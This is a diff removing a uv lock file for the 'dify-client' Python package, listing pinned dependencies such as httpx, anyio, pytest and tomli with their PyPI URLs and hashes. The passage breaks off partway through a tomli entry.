/dev/null @@ -1,307 +0,0 @@ -version = 1 -revision = 3 -requires-python = ">=3.10" - -[[package]] -name = "aiofiles" -version = "25.1.0" -source = { registry = "https://pypi.org/simple" } -sdist = { url = "https://files.pythonhosted.org/packages/41/c3/534eac40372d8ee36ef40df62ec129bee4fdb5ad9706e58a29be53b2c970/aiofiles-25.1.0.tar.gz", hash = "sha256:a8d728f0a29de45dc521f18f07297428d56992a742f0cd2701ba86e44d23d5b2", size = 46354, 
upload-time = "2025-10-09T20:51:04.358Z" } -wheels = [ - { url = "https://files.pythonhosted.org/packages/bc/8a/340a1555ae33d7354dbca4faa54948d76d89a27ceef032c8c3bc661d003e/aiofiles-25.1.0-py3-none-any.whl", hash = "sha256:abe311e527c862958650f9438e859c1fa7568a141b22abcd015e120e86a85695", size = 14668, upload-time = "2025-10-09T20:51:03.174Z" }, -] - -[[package]] -name = "anyio" -version = "4.11.0" -source = { registry = "https://pypi.org/simple" } -dependencies = [ - { name = "exceptiongroup", marker = "python_full_version < '3.11'" }, - { name = "idna" }, - { name = "sniffio" }, - { name = "typing-extensions", marker = "python_full_version < '3.13'" }, -] -sdist = { url = "https://files.pythonhosted.org/packages/c6/78/7d432127c41b50bccba979505f272c16cbcadcc33645d5fa3a738110ae75/anyio-4.11.0.tar.gz", hash = "sha256:82a8d0b81e318cc5ce71a5f1f8b5c4e63619620b63141ef8c995fa0db95a57c4", size = 219094, upload-time = "2025-09-23T09:19:12.58Z" } -wheels = [ - { url = "https://files.pythonhosted.org/packages/15/b3/9b1a8074496371342ec1e796a96f99c82c945a339cd81a8e73de28b4cf9e/anyio-4.11.0-py3-none-any.whl", hash = "sha256:0287e96f4d26d4149305414d4e3bc32f0dcd0862365a4bddea19d7a1ec38c4fc", size = 109097, upload-time = "2025-09-23T09:19:10.601Z" }, -] - -[[package]] -name = "backports-asyncio-runner" -version = "1.2.0" -source = { registry = "https://pypi.org/simple" } -sdist = { url = "https://files.pythonhosted.org/packages/8e/ff/70dca7d7cb1cbc0edb2c6cc0c38b65cba36cccc491eca64cabd5fe7f8670/backports_asyncio_runner-1.2.0.tar.gz", hash = "sha256:a5aa7b2b7d8f8bfcaa2b57313f70792df84e32a2a746f585213373f900b42162", size = 69893, upload-time = "2025-07-02T02:27:15.685Z" } -wheels = [ - { url = "https://files.pythonhosted.org/packages/a0/59/76ab57e3fe74484f48a53f8e337171b4a2349e506eabe136d7e01d059086/backports_asyncio_runner-1.2.0-py3-none-any.whl", hash = "sha256:0da0a936a8aeb554eccb426dc55af3ba63bcdc69fa1a600b5bb305413a4477b5", size = 12313, upload-time = "2025-07-02T02:27:14.263Z" }, -] - -[[package]] -name = "certifi" -version = "2025.10.5" -source = { registry = "https://pypi.org/simple" } -sdist = { url = "https://files.pythonhosted.org/packages/4c/5b/b6ce21586237c77ce67d01dc5507039d444b630dd76611bbca2d8e5dcd91/certifi-2025.10.5.tar.gz", hash = "sha256:47c09d31ccf2acf0be3f701ea53595ee7e0b8fa08801c6624be771df09ae7b43", size = 164519, upload-time = "2025-10-05T04:12:15.808Z" } -wheels = [ - { url = "https://files.pythonhosted.org/packages/e4/37/af0d2ef3967ac0d6113837b44a4f0bfe1328c2b9763bd5b1744520e5cfed/certifi-2025.10.5-py3-none-any.whl", hash = "sha256:0f212c2744a9bb6de0c56639a6f68afe01ecd92d91f14ae897c4fe7bbeeef0de", size = 163286, upload-time = "2025-10-05T04:12:14.03Z" }, -] - -[[package]] -name = "colorama" -version = "0.4.6" -source = { registry = "https://pypi.org/simple" } -sdist = { url = "https://files.pythonhosted.org/packages/d8/53/6f443c9a4a8358a93a6792e2acffb9d9d5cb0a5cfd8802644b7b1c9a02e4/colorama-0.4.6.tar.gz", hash = "sha256:08695f5cb7ed6e0531a20572697297273c47b8cae5a63ffc6d6ed5c201be6e44", size = 27697, upload-time = "2022-10-25T02:36:22.414Z" } -wheels = [ - { url = "https://files.pythonhosted.org/packages/d1/d6/3965ed04c63042e047cb6a3e6ed1a63a35087b6a609aa3a15ed8ac56c221/colorama-0.4.6-py2.py3-none-any.whl", hash = "sha256:4f1d9991f5acc0ca119f9d443620b77f9d6b33703e51011c16baf57afb285fc6", size = 25335, upload-time = "2022-10-25T02:36:20.889Z" }, -] - -[[package]] -name = "dify-client" -version = "0.1.12" -source = { editable = "." 
} -dependencies = [ - { name = "aiofiles" }, - { name = "httpx", extra = ["http2"] }, -] - -[package.optional-dependencies] -dev = [ - { name = "pytest" }, - { name = "pytest-asyncio" }, -] - -[package.metadata] -requires-dist = [ - { name = "aiofiles", specifier = ">=23.0.0" }, - { name = "httpx", extras = ["http2"], specifier = ">=0.27.0" }, - { name = "pytest", marker = "extra == 'dev'", specifier = ">=7.0.0" }, - { name = "pytest-asyncio", marker = "extra == 'dev'", specifier = ">=0.21.0" }, -] -provides-extras = ["dev"] - -[[package]] -name = "exceptiongroup" -version = "1.3.0" -source = { registry = "https://pypi.org/simple" } -dependencies = [ - { name = "typing-extensions", marker = "python_full_version < '3.13'" }, -] -sdist = { url = "https://files.pythonhosted.org/packages/0b/9f/a65090624ecf468cdca03533906e7c69ed7588582240cfe7cc9e770b50eb/exceptiongroup-1.3.0.tar.gz", hash = "sha256:b241f5885f560bc56a59ee63ca4c6a8bfa46ae4ad651af316d4e81817bb9fd88", size = 29749, upload-time = "2025-05-10T17:42:51.123Z" } -wheels = [ - { url = "https://files.pythonhosted.org/packages/36/f4/c6e662dade71f56cd2f3735141b265c3c79293c109549c1e6933b0651ffc/exceptiongroup-1.3.0-py3-none-any.whl", hash = "sha256:4d111e6e0c13d0644cad6ddaa7ed0261a0b36971f6d23e7ec9b4b9097da78a10", size = 16674, upload-time = "2025-05-10T17:42:49.33Z" }, -] - -[[package]] -name = "h11" -version = "0.16.0" -source = { registry = "https://pypi.org/simple" } -sdist = { url = "https://files.pythonhosted.org/packages/01/ee/02a2c011bdab74c6fb3c75474d40b3052059d95df7e73351460c8588d963/h11-0.16.0.tar.gz", hash = "sha256:4e35b956cf45792e4caa5885e69fba00bdbc6ffafbfa020300e549b208ee5ff1", size = 101250, upload-time = "2025-04-24T03:35:25.427Z" } -wheels = [ - { url = "https://files.pythonhosted.org/packages/04/4b/29cac41a4d98d144bf5f6d33995617b185d14b22401f75ca86f384e87ff1/h11-0.16.0-py3-none-any.whl", hash = "sha256:63cf8bbe7522de3bf65932fda1d9c2772064ffb3dae62d55932da54b31cb6c86", size = 37515, upload-time = "2025-04-24T03:35:24.344Z" }, -] - -[[package]] -name = "h2" -version = "4.3.0" -source = { registry = "https://pypi.org/simple" } -dependencies = [ - { name = "hpack" }, - { name = "hyperframe" }, -] -sdist = { url = "https://files.pythonhosted.org/packages/1d/17/afa56379f94ad0fe8defd37d6eb3f89a25404ffc71d4d848893d270325fc/h2-4.3.0.tar.gz", hash = "sha256:6c59efe4323fa18b47a632221a1888bd7fde6249819beda254aeca909f221bf1", size = 2152026, upload-time = "2025-08-23T18:12:19.778Z" } -wheels = [ - { url = "https://files.pythonhosted.org/packages/69/b2/119f6e6dcbd96f9069ce9a2665e0146588dc9f88f29549711853645e736a/h2-4.3.0-py3-none-any.whl", hash = "sha256:c438f029a25f7945c69e0ccf0fb951dc3f73a5f6412981daee861431b70e2bdd", size = 61779, upload-time = "2025-08-23T18:12:17.779Z" }, -] - -[[package]] -name = "hpack" -version = "4.1.0" -source = { registry = "https://pypi.org/simple" } -sdist = { url = "https://files.pythonhosted.org/packages/2c/48/71de9ed269fdae9c8057e5a4c0aa7402e8bb16f2c6e90b3aa53327b113f8/hpack-4.1.0.tar.gz", hash = "sha256:ec5eca154f7056aa06f196a557655c5b009b382873ac8d1e66e79e87535f1dca", size = 51276, upload-time = "2025-01-22T21:44:58.347Z" } -wheels = [ - { url = "https://files.pythonhosted.org/packages/07/c6/80c95b1b2b94682a72cbdbfb85b81ae2daffa4291fbfa1b1464502ede10d/hpack-4.1.0-py3-none-any.whl", hash = "sha256:157ac792668d995c657d93111f46b4535ed114f0c9c8d672271bbec7eae1b496", size = 34357, upload-time = "2025-01-22T21:44:56.92Z" }, -] - -[[package]] -name = "httpcore" -version = "1.0.9" -source = { registry = 
"https://pypi.org/simple" } -dependencies = [ - { name = "certifi" }, - { name = "h11" }, -] -sdist = { url = "https://files.pythonhosted.org/packages/06/94/82699a10bca87a5556c9c59b5963f2d039dbd239f25bc2a63907a05a14cb/httpcore-1.0.9.tar.gz", hash = "sha256:6e34463af53fd2ab5d807f399a9b45ea31c3dfa2276f15a2c3f00afff6e176e8", size = 85484, upload-time = "2025-04-24T22:06:22.219Z" } -wheels = [ - { url = "https://files.pythonhosted.org/packages/7e/f5/f66802a942d491edb555dd61e3a9961140fd64c90bce1eafd741609d334d/httpcore-1.0.9-py3-none-any.whl", hash = "sha256:2d400746a40668fc9dec9810239072b40b4484b640a8c38fd654a024c7a1bf55", size = 78784, upload-time = "2025-04-24T22:06:20.566Z" }, -] - -[[package]] -name = "httpx" -version = "0.28.1" -source = { registry = "https://pypi.org/simple" } -dependencies = [ - { name = "anyio" }, - { name = "certifi" }, - { name = "httpcore" }, - { name = "idna" }, -] -sdist = { url = "https://files.pythonhosted.org/packages/b1/df/48c586a5fe32a0f01324ee087459e112ebb7224f646c0b5023f5e79e9956/httpx-0.28.1.tar.gz", hash = "sha256:75e98c5f16b0f35b567856f597f06ff2270a374470a5c2392242528e3e3e42fc", size = 141406, upload-time = "2024-12-06T15:37:23.222Z" } -wheels = [ - { url = "https://files.pythonhosted.org/packages/2a/39/e50c7c3a983047577ee07d2a9e53faf5a69493943ec3f6a384bdc792deb2/httpx-0.28.1-py3-none-any.whl", hash = "sha256:d909fcccc110f8c7faf814ca82a9a4d816bc5a6dbfea25d6591d6985b8ba59ad", size = 73517, upload-time = "2024-12-06T15:37:21.509Z" }, -] - -[package.optional-dependencies] -http2 = [ - { name = "h2" }, -] - -[[package]] -name = "hyperframe" -version = "6.1.0" -source = { registry = "https://pypi.org/simple" } -sdist = { url = "https://files.pythonhosted.org/packages/02/e7/94f8232d4a74cc99514c13a9f995811485a6903d48e5d952771ef6322e30/hyperframe-6.1.0.tar.gz", hash = "sha256:f630908a00854a7adeabd6382b43923a4c4cd4b821fcb527e6ab9e15382a3b08", size = 26566, upload-time = "2025-01-22T21:41:49.302Z" } -wheels = [ - { url = "https://files.pythonhosted.org/packages/48/30/47d0bf6072f7252e6521f3447ccfa40b421b6824517f82854703d0f5a98b/hyperframe-6.1.0-py3-none-any.whl", hash = "sha256:b03380493a519fce58ea5af42e4a42317bf9bd425596f7a0835ffce80f1a42e5", size = 13007, upload-time = "2025-01-22T21:41:47.295Z" }, -] - -[[package]] -name = "idna" -version = "3.10" -source = { registry = "https://pypi.org/simple" } -sdist = { url = "https://files.pythonhosted.org/packages/f1/70/7703c29685631f5a7590aa73f1f1d3fa9a380e654b86af429e0934a32f7d/idna-3.10.tar.gz", hash = "sha256:12f65c9b470abda6dc35cf8e63cc574b1c52b11df2c86030af0ac09b01b13ea9", size = 190490, upload-time = "2024-09-15T18:07:39.745Z" } -wheels = [ - { url = "https://files.pythonhosted.org/packages/76/c6/c88e154df9c4e1a2a66ccf0005a88dfb2650c1dffb6f5ce603dfbd452ce3/idna-3.10-py3-none-any.whl", hash = "sha256:946d195a0d259cbba61165e88e65941f16e9b36ea6ddb97f00452bae8b1287d3", size = 70442, upload-time = "2024-09-15T18:07:37.964Z" }, -] - -[[package]] -name = "iniconfig" -version = "2.1.0" -source = { registry = "https://pypi.org/simple" } -sdist = { url = "https://files.pythonhosted.org/packages/f2/97/ebf4da567aa6827c909642694d71c9fcf53e5b504f2d96afea02718862f3/iniconfig-2.1.0.tar.gz", hash = "sha256:3abbd2e30b36733fee78f9c7f7308f2d0050e88f0087fd25c2645f63c773e1c7", size = 4793, upload-time = "2025-03-19T20:09:59.721Z" } -wheels = [ - { url = "https://files.pythonhosted.org/packages/2c/e1/e6716421ea10d38022b952c159d5161ca1193197fb744506875fbb87ea7b/iniconfig-2.1.0-py3-none-any.whl", hash = 
"sha256:9deba5723312380e77435581c6bf4935c94cbfab9b1ed33ef8d238ea168eb760", size = 6050, upload-time = "2025-03-19T20:10:01.071Z" }, -] - -[[package]] -name = "packaging" -version = "25.0" -source = { registry = "https://pypi.org/simple" } -sdist = { url = "https://files.pythonhosted.org/packages/a1/d4/1fc4078c65507b51b96ca8f8c3ba19e6a61c8253c72794544580a7b6c24d/packaging-25.0.tar.gz", hash = "sha256:d443872c98d677bf60f6a1f2f8c1cb748e8fe762d2bf9d3148b5599295b0fc4f", size = 165727, upload-time = "2025-04-19T11:48:59.673Z" } -wheels = [ - { url = "https://files.pythonhosted.org/packages/20/12/38679034af332785aac8774540895e234f4d07f7545804097de4b666afd8/packaging-25.0-py3-none-any.whl", hash = "sha256:29572ef2b1f17581046b3a2227d5c611fb25ec70ca1ba8554b24b0e69331a484", size = 66469, upload-time = "2025-04-19T11:48:57.875Z" }, -] - -[[package]] -name = "pluggy" -version = "1.6.0" -source = { registry = "https://pypi.org/simple" } -sdist = { url = "https://files.pythonhosted.org/packages/f9/e2/3e91f31a7d2b083fe6ef3fa267035b518369d9511ffab804f839851d2779/pluggy-1.6.0.tar.gz", hash = "sha256:7dcc130b76258d33b90f61b658791dede3486c3e6bfb003ee5c9bfb396dd22f3", size = 69412, upload-time = "2025-05-15T12:30:07.975Z" } -wheels = [ - { url = "https://files.pythonhosted.org/packages/54/20/4d324d65cc6d9205fabedc306948156824eb9f0ee1633355a8f7ec5c66bf/pluggy-1.6.0-py3-none-any.whl", hash = "sha256:e920276dd6813095e9377c0bc5566d94c932c33b27a3e3945d8389c374dd4746", size = 20538, upload-time = "2025-05-15T12:30:06.134Z" }, -] - -[[package]] -name = "pygments" -version = "2.19.2" -source = { registry = "https://pypi.org/simple" } -sdist = { url = "https://files.pythonhosted.org/packages/b0/77/a5b8c569bf593b0140bde72ea885a803b82086995367bf2037de0159d924/pygments-2.19.2.tar.gz", hash = "sha256:636cb2477cec7f8952536970bc533bc43743542f70392ae026374600add5b887", size = 4968631, upload-time = "2025-06-21T13:39:12.283Z" } -wheels = [ - { url = "https://files.pythonhosted.org/packages/c7/21/705964c7812476f378728bdf590ca4b771ec72385c533964653c68e86bdc/pygments-2.19.2-py3-none-any.whl", hash = "sha256:86540386c03d588bb81d44bc3928634ff26449851e99741617ecb9037ee5ec0b", size = 1225217, upload-time = "2025-06-21T13:39:07.939Z" }, -] - -[[package]] -name = "pytest" -version = "8.4.2" -source = { registry = "https://pypi.org/simple" } -dependencies = [ - { name = "colorama", marker = "sys_platform == 'win32'" }, - { name = "exceptiongroup", marker = "python_full_version < '3.11'" }, - { name = "iniconfig" }, - { name = "packaging" }, - { name = "pluggy" }, - { name = "pygments" }, - { name = "tomli", marker = "python_full_version < '3.11'" }, -] -sdist = { url = "https://files.pythonhosted.org/packages/a3/5c/00a0e072241553e1a7496d638deababa67c5058571567b92a7eaa258397c/pytest-8.4.2.tar.gz", hash = "sha256:86c0d0b93306b961d58d62a4db4879f27fe25513d4b969df351abdddb3c30e01", size = 1519618, upload-time = "2025-09-04T14:34:22.711Z" } -wheels = [ - { url = "https://files.pythonhosted.org/packages/a8/a4/20da314d277121d6534b3a980b29035dcd51e6744bd79075a6ce8fa4eb8d/pytest-8.4.2-py3-none-any.whl", hash = "sha256:872f880de3fc3a5bdc88a11b39c9710c3497a547cfa9320bc3c5e62fbf272e79", size = 365750, upload-time = "2025-09-04T14:34:20.226Z" }, -] - -[[package]] -name = "pytest-asyncio" -version = "1.2.0" -source = { registry = "https://pypi.org/simple" } -dependencies = [ - { name = "backports-asyncio-runner", marker = "python_full_version < '3.11'" }, - { name = "pytest" }, - { name = "typing-extensions", marker = "python_full_version < '3.13'" }, 
-] -sdist = { url = "https://files.pythonhosted.org/packages/42/86/9e3c5f48f7b7b638b216e4b9e645f54d199d7abbbab7a64a13b4e12ba10f/pytest_asyncio-1.2.0.tar.gz", hash = "sha256:c609a64a2a8768462d0c99811ddb8bd2583c33fd33cf7f21af1c142e824ffb57", size = 50119, upload-time = "2025-09-12T07:33:53.816Z" } -wheels = [ - { url = "https://files.pythonhosted.org/packages/04/93/2fa34714b7a4ae72f2f8dad66ba17dd9a2c793220719e736dda28b7aec27/pytest_asyncio-1.2.0-py3-none-any.whl", hash = "sha256:8e17ae5e46d8e7efe51ab6494dd2010f4ca8dae51652aa3c8d55acf50bfb2e99", size = 15095, upload-time = "2025-09-12T07:33:52.639Z" }, -] - -[[package]] -name = "sniffio" -version = "1.3.1" -source = { registry = "https://pypi.org/simple" } -sdist = { url = "https://files.pythonhosted.org/packages/a2/87/a6771e1546d97e7e041b6ae58d80074f81b7d5121207425c964ddf5cfdbd/sniffio-1.3.1.tar.gz", hash = "sha256:f4324edc670a0f49750a81b895f35c3adb843cca46f0530f79fc1babb23789dc", size = 20372, upload-time = "2024-02-25T23:20:04.057Z" } -wheels = [ - { url = "https://files.pythonhosted.org/packages/e9/44/75a9c9421471a6c4805dbf2356f7c181a29c1879239abab1ea2cc8f38b40/sniffio-1.3.1-py3-none-any.whl", hash = "sha256:2f6da418d1f1e0fddd844478f41680e794e6051915791a034ff65e5f100525a2", size = 10235, upload-time = "2024-02-25T23:20:01.196Z" }, -] - -[[package]] -name = "tomli" -version = "2.3.0" -source = { registry = "https://pypi.org/simple" } -sdist = { url = "https://files.pythonhosted.org/packages/52/ed/3f73f72945444548f33eba9a87fc7a6e969915e7b1acc8260b30e1f76a2f/tomli-2.3.0.tar.gz", hash = "sha256:64be704a875d2a59753d80ee8a533c3fe183e3f06807ff7dc2232938ccb01549", size = 17392, upload-time = "2025-10-08T22:01:47.119Z" } -wheels = [ - { url = "https://files.pythonhosted.org/packages/b3/2e/299f62b401438d5fe1624119c723f5d877acc86a4c2492da405626665f12/tomli-2.3.0-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:88bd15eb972f3664f5ed4b57c1634a97153b4bac4479dcb6a495f41921eb7f45", size = 153236, upload-time = "2025-10-08T22:01:00.137Z" }, - { url = "https://files.pythonhosted.org/packages/86/7f/d8fffe6a7aefdb61bced88fcb5e280cfd71e08939da5894161bd71bea022/tomli-2.3.0-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:883b1c0d6398a6a9d29b508c331fa56adbcdff647f6ace4dfca0f50e90dfd0ba", size = 148084, upload-time = "2025-10-08T22:01:01.63Z" }, - { url = "https://files.pythonhosted.org/packages/47/5c/24935fb6a2ee63e86d80e4d3b58b222dafaf438c416752c8b58537c8b89a/tomli-2.3.0-cp311-cp311-manylinux2014_aarch64.manylinux_2_17_aarch64.manylinux_2_28_aarch64.whl", hash = "sha256:d1381caf13ab9f300e30dd8feadb3de072aeb86f1d34a8569453ff32a7dea4bf", size = 234832, upload-time = "2025-10-08T22:01:02.543Z" }, - { url = "https://files.pythonhosted.org/packages/89/da/75dfd804fc11e6612846758a23f13271b76d577e299592b4371a4ca4cd09/tomli-2.3.0-cp311-cp311-manylinux2014_x86_64.manylinux_2_17_x86_64.manylinux_2_28_x86_64.whl", hash = "sha256:a0e285d2649b78c0d9027570d4da3425bdb49830a6156121360b3f8511ea3441", size = 242052, upload-time = "2025-10-08T22:01:03.836Z" }, - { url = "https://files.pythonhosted.org/packages/70/8c/f48ac899f7b3ca7eb13af73bacbc93aec37f9c954df3c08ad96991c8c373/tomli-2.3.0-cp311-cp311-musllinux_1_2_aarch64.whl", hash = "sha256:0a154a9ae14bfcf5d8917a59b51ffd5a3ac1fd149b71b47a3a104ca4edcfa845", size = 239555, upload-time = "2025-10-08T22:01:04.834Z" }, - { url = "https://files.pythonhosted.org/packages/ba/28/72f8afd73f1d0e7829bfc093f4cb98ce0a40ffc0cc997009ee1ed94ba705/tomli-2.3.0-cp311-cp311-musllinux_1_2_x86_64.whl", hash = 
"sha256:74bf8464ff93e413514fefd2be591c3b0b23231a77f901db1eb30d6f712fc42c", size = 245128, upload-time = "2025-10-08T22:01:05.84Z" }, - { url = "https://files.pythonhosted.org/packages/b6/eb/a7679c8ac85208706d27436e8d421dfa39d4c914dcf5fa8083a9305f58d9/tomli-2.3.0-cp311-cp311-win32.whl", hash = "sha256:00b5f5d95bbfc7d12f91ad8c593a1659b6387b43f054104cda404be6bda62456", size = 96445, upload-time = "2025-10-08T22:01:06.896Z" }, - { url = "https://files.pythonhosted.org/packages/0a/fe/3d3420c4cb1ad9cb462fb52967080575f15898da97e21cb6f1361d505383/tomli-2.3.0-cp311-cp311-win_amd64.whl", hash = "sha256:4dc4ce8483a5d429ab602f111a93a6ab1ed425eae3122032db7e9acf449451be", size = 107165, upload-time = "2025-10-08T22:01:08.107Z" }, - { url = "https://files.pythonhosted.org/packages/ff/b7/40f36368fcabc518bb11c8f06379a0fd631985046c038aca08c6d6a43c6e/tomli-2.3.0-cp312-cp312-macosx_10_13_x86_64.whl", hash = "sha256:d7d86942e56ded512a594786a5ba0a5e521d02529b3826e7761a05138341a2ac", size = 154891, upload-time = "2025-10-08T22:01:09.082Z" }, - { url = "https://files.pythonhosted.org/packages/f9/3f/d9dd692199e3b3aab2e4e4dd948abd0f790d9ded8cd10cbaae276a898434/tomli-2.3.0-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:73ee0b47d4dad1c5e996e3cd33b8a76a50167ae5f96a2607cbe8cc773506ab22", size = 148796, upload-time = "2025-10-08T22:01:10.266Z" }, - { url = "https://files.pythonhosted.org/packages/60/83/59bff4996c2cf9f9387a0f5a3394629c7efa5ef16142076a23a90f1955fa/tomli-2.3.0-cp312-cp312-manylinux2014_aarch64.manylinux_2_17_aarch64.manylinux_2_28_aarch64.whl", hash = "sha256:792262b94d5d0a466afb5bc63c7daa9d75520110971ee269152083270998316f", size = 242121, upload-time = "2025-10-08T22:01:11.332Z" }, - { url = "https://files.pythonhosted.org/packages/45/e5/7c5119ff39de8693d6baab6c0b6dcb556d192c165596e9fc231ea1052041/tomli-2.3.0-cp312-cp312-manylinux2014_x86_64.manylinux_2_17_x86_64.manylinux_2_28_x86_64.whl", hash = "sha256:4f195fe57ecceac95a66a75ac24d9d5fbc98ef0962e09b2eddec5d39375aae52", size = 250070, upload-time = "2025-10-08T22:01:12.498Z" }, - { url = "https://files.pythonhosted.org/packages/45/12/ad5126d3a278f27e6701abde51d342aa78d06e27ce2bb596a01f7709a5a2/tomli-2.3.0-cp312-cp312-musllinux_1_2_aarch64.whl", hash = "sha256:e31d432427dcbf4d86958c184b9bfd1e96b5b71f8eb17e6d02531f434fd335b8", size = 245859, upload-time = "2025-10-08T22:01:13.551Z" }, - { url = "https://files.pythonhosted.org/packages/fb/a1/4d6865da6a71c603cfe6ad0e6556c73c76548557a8d658f9e3b142df245f/tomli-2.3.0-cp312-cp312-musllinux_1_2_x86_64.whl", hash = "sha256:7b0882799624980785240ab732537fcfc372601015c00f7fc367c55308c186f6", size = 250296, upload-time = "2025-10-08T22:01:14.614Z" }, - { url = "https://files.pythonhosted.org/packages/a0/b7/a7a7042715d55c9ba6e8b196d65d2cb662578b4d8cd17d882d45322b0d78/tomli-2.3.0-cp312-cp312-win32.whl", hash = "sha256:ff72b71b5d10d22ecb084d345fc26f42b5143c5533db5e2eaba7d2d335358876", size = 97124, upload-time = "2025-10-08T22:01:15.629Z" }, - { url = "https://files.pythonhosted.org/packages/06/1e/f22f100db15a68b520664eb3328fb0ae4e90530887928558112c8d1f4515/tomli-2.3.0-cp312-cp312-win_amd64.whl", hash = "sha256:1cb4ed918939151a03f33d4242ccd0aa5f11b3547d0cf30f7c74a408a5b99878", size = 107698, upload-time = "2025-10-08T22:01:16.51Z" }, - { url = "https://files.pythonhosted.org/packages/89/48/06ee6eabe4fdd9ecd48bf488f4ac783844fd777f547b8d1b61c11939974e/tomli-2.3.0-cp313-cp313-macosx_10_13_x86_64.whl", hash = "sha256:5192f562738228945d7b13d4930baffda67b69425a7f0da96d360b0a3888136b", size = 154819, upload-time = 
"2025-10-08T22:01:17.964Z" }, - { url = "https://files.pythonhosted.org/packages/f1/01/88793757d54d8937015c75dcdfb673c65471945f6be98e6a0410fba167ed/tomli-2.3.0-cp313-cp313-macosx_11_0_arm64.whl", hash = "sha256:be71c93a63d738597996be9528f4abe628d1adf5e6eb11607bc8fe1a510b5dae", size = 148766, upload-time = "2025-10-08T22:01:18.959Z" }, - { url = "https://files.pythonhosted.org/packages/42/17/5e2c956f0144b812e7e107f94f1cc54af734eb17b5191c0bbfb72de5e93e/tomli-2.3.0-cp313-cp313-manylinux2014_aarch64.manylinux_2_17_aarch64.manylinux_2_28_aarch64.whl", hash = "sha256:c4665508bcbac83a31ff8ab08f424b665200c0e1e645d2bd9ab3d3e557b6185b", size = 240771, upload-time = "2025-10-08T22:01:20.106Z" }, - { url = "https://files.pythonhosted.org/packages/d5/f4/0fbd014909748706c01d16824eadb0307115f9562a15cbb012cd9b3512c5/tomli-2.3.0-cp313-cp313-manylinux2014_x86_64.manylinux_2_17_x86_64.manylinux_2_28_x86_64.whl", hash = "sha256:4021923f97266babc6ccab9f5068642a0095faa0a51a246a6a02fccbb3514eaf", size = 248586, upload-time = "2025-10-08T22:01:21.164Z" }, - { url = "https://files.pythonhosted.org/packages/30/77/fed85e114bde5e81ecf9bc5da0cc69f2914b38f4708c80ae67d0c10180c5/tomli-2.3.0-cp313-cp313-musllinux_1_2_aarch64.whl", hash = "sha256:a4ea38c40145a357d513bffad0ed869f13c1773716cf71ccaa83b0fa0cc4e42f", size = 244792, upload-time = "2025-10-08T22:01:22.417Z" }, - { url = "https://files.pythonhosted.org/packages/55/92/afed3d497f7c186dc71e6ee6d4fcb0acfa5f7d0a1a2878f8beae379ae0cc/tomli-2.3.0-cp313-cp313-musllinux_1_2_x86_64.whl", hash = "sha256:ad805ea85eda330dbad64c7ea7a4556259665bdf9d2672f5dccc740eb9d3ca05", size = 248909, upload-time = "2025-10-08T22:01:23.859Z" }, - { url = "https://files.pythonhosted.org/packages/f8/84/ef50c51b5a9472e7265ce1ffc7f24cd4023d289e109f669bdb1553f6a7c2/tomli-2.3.0-cp313-cp313-win32.whl", hash = "sha256:97d5eec30149fd3294270e889b4234023f2c69747e555a27bd708828353ab606", size = 96946, upload-time = "2025-10-08T22:01:24.893Z" }, - { url = "https://files.pythonhosted.org/packages/b2/b7/718cd1da0884f281f95ccfa3a6cc572d30053cba64603f79d431d3c9b61b/tomli-2.3.0-cp313-cp313-win_amd64.whl", hash = "sha256:0c95ca56fbe89e065c6ead5b593ee64b84a26fca063b5d71a1122bf26e533999", size = 107705, upload-time = "2025-10-08T22:01:26.153Z" }, - { url = "https://files.pythonhosted.org/packages/19/94/aeafa14a52e16163008060506fcb6aa1949d13548d13752171a755c65611/tomli-2.3.0-cp314-cp314-macosx_10_13_x86_64.whl", hash = "sha256:cebc6fe843e0733ee827a282aca4999b596241195f43b4cc371d64fc6639da9e", size = 154244, upload-time = "2025-10-08T22:01:27.06Z" }, - { url = "https://files.pythonhosted.org/packages/db/e4/1e58409aa78eefa47ccd19779fc6f36787edbe7d4cd330eeeedb33a4515b/tomli-2.3.0-cp314-cp314-macosx_11_0_arm64.whl", hash = "sha256:4c2ef0244c75aba9355561272009d934953817c49f47d768070c3c94355c2aa3", size = 148637, upload-time = "2025-10-08T22:01:28.059Z" }, - { url = "https://files.pythonhosted.org/packages/26/b6/d1eccb62f665e44359226811064596dd6a366ea1f985839c566cd61525ae/tomli-2.3.0-cp314-cp314-manylinux2014_aarch64.manylinux_2_17_aarch64.manylinux_2_28_aarch64.whl", hash = "sha256:c22a8bf253bacc0cf11f35ad9808b6cb75ada2631c2d97c971122583b129afbc", size = 241925, upload-time = "2025-10-08T22:01:29.066Z" }, - { url = "https://files.pythonhosted.org/packages/70/91/7cdab9a03e6d3d2bb11beae108da5bdc1c34bdeb06e21163482544ddcc90/tomli-2.3.0-cp314-cp314-manylinux2014_x86_64.manylinux_2_17_x86_64.manylinux_2_28_x86_64.whl", hash = "sha256:0eea8cc5c5e9f89c9b90c4896a8deefc74f518db5927d0e0e8d4a80953d774d0", size = 249045, 
upload-time = "2025-10-08T22:01:31.98Z" }, - { url = "https://files.pythonhosted.org/packages/15/1b/8c26874ed1f6e4f1fcfeb868db8a794cbe9f227299402db58cfcc858766c/tomli-2.3.0-cp314-cp314-musllinux_1_2_aarch64.whl", hash = "sha256:b74a0e59ec5d15127acdabd75ea17726ac4c5178ae51b85bfe39c4f8a278e879", size = 245835, upload-time = "2025-10-08T22:01:32.989Z" }, - { url = "https://files.pythonhosted.org/packages/fd/42/8e3c6a9a4b1a1360c1a2a39f0b972cef2cc9ebd56025168c4137192a9321/tomli-2.3.0-cp314-cp314-musllinux_1_2_x86_64.whl", hash = "sha256:b5870b50c9db823c595983571d1296a6ff3e1b88f734a4c8f6fc6188397de005", size = 253109, upload-time = "2025-10-08T22:01:34.052Z" }, - { url = "https://files.pythonhosted.org/packages/22/0c/b4da635000a71b5f80130937eeac12e686eefb376b8dee113b4a582bba42/tomli-2.3.0-cp314-cp314-win32.whl", hash = "sha256:feb0dacc61170ed7ab602d3d972a58f14ee3ee60494292d384649a3dc38ef463", size = 97930, upload-time = "2025-10-08T22:01:35.082Z" }, - { url = "https://files.pythonhosted.org/packages/b9/74/cb1abc870a418ae99cd5c9547d6bce30701a954e0e721821df483ef7223c/tomli-2.3.0-cp314-cp314-win_amd64.whl", hash = "sha256:b273fcbd7fc64dc3600c098e39136522650c49bca95df2d11cf3b626422392c8", size = 107964, upload-time = "2025-10-08T22:01:36.057Z" }, - { url = "https://files.pythonhosted.org/packages/54/78/5c46fff6432a712af9f792944f4fcd7067d8823157949f4e40c56b8b3c83/tomli-2.3.0-cp314-cp314t-macosx_10_13_x86_64.whl", hash = 